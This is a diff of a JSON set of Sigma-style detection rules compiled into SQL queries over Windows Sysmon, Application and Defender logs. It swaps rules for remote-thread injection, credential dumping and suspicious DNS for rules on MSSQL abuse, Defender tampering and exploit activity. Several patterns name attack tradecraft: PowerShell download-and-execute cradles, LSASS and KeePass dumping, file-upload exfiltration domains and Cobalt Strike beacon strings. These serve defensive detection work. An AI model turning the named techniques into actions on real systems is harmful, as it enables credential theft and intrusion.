"title": "Atera Agent Installation", + "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "status": "test", + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate Atera agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_targets.yml" + "filename": "win_software_atera_rmm_agent_install.yml" }, { - "title": "KeePass Password Dumping", - "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", "status": "experimental", - "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", - "author": "Timon Hackenjos", + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.005" + "attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Other MSI packages for which your admins have used that name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_keepass.yml" + "filename": "win_vul_cve_2021_41379.yml" }, { - "title": "Bumblebee Remote Thread Creation", - "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "title": "Microsoft Malware Protection Engine Crash - WER", + "id": "6c82cf5c-090d-4d57-9188-533577631108", "status": "experimental", - "description": "Detects remote thread injection events based on action seen used by bumblebee", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Windows Error Reporting' AND EventID = '1001' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_bumblebee.yml" + "filename": "win_application_msmpeng_crash_wer.yml" }, { - "title": "Password Dumper Remote Thread in LSASS", - "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "status": "stable", - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", - "author": "Thomas Patzke", + "title": "Audit CVE Event", + "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "status": "experimental", + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "author": "Florian Roth (Nextron Systems), Zach Mathis", "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", "attack.credential_access", - "attack.s0005", - "attack.t1003.001" + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" ], "falsepositives": [ - "Antivirus products" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml" + "filename": "win_audit_cve.yml" }, { - "title": "Remote Thread Creation Ttdinject.exe Proxy", - "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "title": "Microsoft Malware Protection Engine Crash", + "id": "545a5da6-f103-4919-a519-e9aec1026ee4", "status": "experimental", - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", - "author": "frack113", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_ttdinjec.yml" + "filename": "win_application_msmpeng_crash_error.yml" }, { - "title": "Suspicious Remote Thread Source", - "id": "66d31e5f-52d6-40a4-9615-002d3789a119", + "title": "Potential Credential Dumping Via WER - Application", + "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Perez Diego (@darkquassar), oscd.community", + "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1055" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate crashing of the lsass process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" ], - "filename": "create_remote_thread_win_susp_remote_thread_source.yml" + "filename": "win_werfault_susp_lsass_credential_dump.yml" }, { - "title": "Accessing WinAPI in PowerShell. Code Injection", - "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "status": "test", - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "author": "Nikita Nazarov, oscd.community", + "title": "Restricted Software Access By SRP", + "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "status": "experimental", + "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml" + "filename": "win_software_restriction_policies_block.yml" }, { - "title": "CACTUSTORCH Remote Thread Creation", - "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "status": "test", - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "title": "MSSQL XPCmdshell Option Change", + "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_cactustorch.yml" + "filename": "win_mssql_xp_cmdshell_change.yml" }, { - "title": "PowerShell Rundll32 Remote Thread Creation", - "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "title": "MSSQL Add Account To Sysadmin Role", + "id": "08200f85-2678-463e-9c32-88dce2f073d1", "status": "experimental", - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Rare legitimate administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml" + "filename": "win_mssql_add_sysadmin_account.yml" }, { - "title": "Suspicious Scripting in a WMI Consumer", - "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "title": "MSSQL Extended Stored Procedure Backdoor Maggie", + "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "status": "experimental", - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "Legitimate administrative scripts" + "Legitimate extended stored procedures named maggie" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_susp_scripting.yml" + "filename": "win_mssql_sp_maggie.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - Sysmon", - "id": "065cceea-77ec-4030-9052-fc0affea7110", + "title": "MSSQL SPProcoption Set", + "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", "status": "experimental", - "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", - "author": "pH-T (Nextron Systems)", + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.persistence" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Legitimate use of the feature by administrators (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_anonymfiles_com.yml" + "filename": "win_mssql_sp_procoption_set.yml" }, { - "title": "DNS HybridConnectionManager Service Bus", - "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "status": "test", - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "MSSQL XPCmdshell Suspicious Execution", + "id": "7f103213-a04e-4d59-8261-213dddf22314", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.execution" ], "falsepositives": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" + "filename": "win_mssql_xp_cmdshell_audit_log.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", - "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", - "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Florian Roth (Nextron Systems)", + "title": "MSSQL Disable Audit Settings", + "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "status": "experimental", + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" ], - "filename": "dns_query_win_mal_cobaltstrike.yml" + "filename": "win_mssql_disable_audit_settings.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - Sysmon", - "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "title": "MSMQ Corrupted Packet Encountered", + "id": "ae94b10d-fee9-4767-82bb-439b309d5a27", "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "yatinwad and TheDFIRReport", + "description": "Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSMQ' AND EventID = '2027' AND Level = '2')" ], - "filename": "dns_query_win_ufile_io.yml" + "filename": "win_msmq_corrupted_packet.yml" }, { - "title": "Regsvr32 Network Activity - DNS", - "id": "36e037c4-c228-4866-b6a3-48eb292b9955", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Windows Defender Threat Detection Disabled", + "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "status": "stable", + "description": "Detects disabling Windows Defender threat protection", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.execution", - "attack.t1559.001", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions (should be investigated)", + "Seen being triggered occasionally during Windows 8 Defender Updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" ], - "filename": "dns_query_win_regsvr32_network_activity.yml" + "filename": "win_defender_disabled.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS", - "id": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8", - "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PSExec and WMI Process Creations Block", + "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "status": "test", + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control" + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (QueryName LIKE '%akamaicontainer.com%' ESCAPE '\\' OR QueryName LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR QueryName LIKE '%azuredeploystore.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR QueryName LIKE '%dunamistrd.com%' ESCAPE '\\' OR QueryName LIKE '%glcloudservice.com%' ESCAPE '\\' OR QueryName LIKE '%journalide.org%' ESCAPE '\\' OR QueryName LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR QueryName LIKE '%msedgeupdate.net%' ESCAPE '\\' OR QueryName LIKE '%msstorageazure.com%' ESCAPE '\\' OR QueryName LIKE '%msstorageboxes.com%' ESCAPE '\\' OR QueryName LIKE '%officeaddons.com%' ESCAPE '\\' OR QueryName LIKE '%officestoragebox.com%' ESCAPE '\\' OR QueryName LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR QueryName LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR QueryName LIKE '%pbxsources.com%' ESCAPE '\\' OR QueryName LIKE '%qwepoi123098.com%' ESCAPE '\\' OR QueryName LIKE '%sbmsa.wiki%' ESCAPE '\\' OR QueryName LIKE '%sourceslabs.com%' ESCAPE '\\' OR QueryName LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR QueryName LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" ], - "filename": "dns_query_win_malware_3cx_compromise.yml" + "filename": "win_defender_psexec_wmi_asr.yml" }, { - "title": "DNS Query for MEGA.io Upload Domain - Sysmon", - "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", - "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "status": "experimental", + "description": "Detects Access to LSASS Process", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' 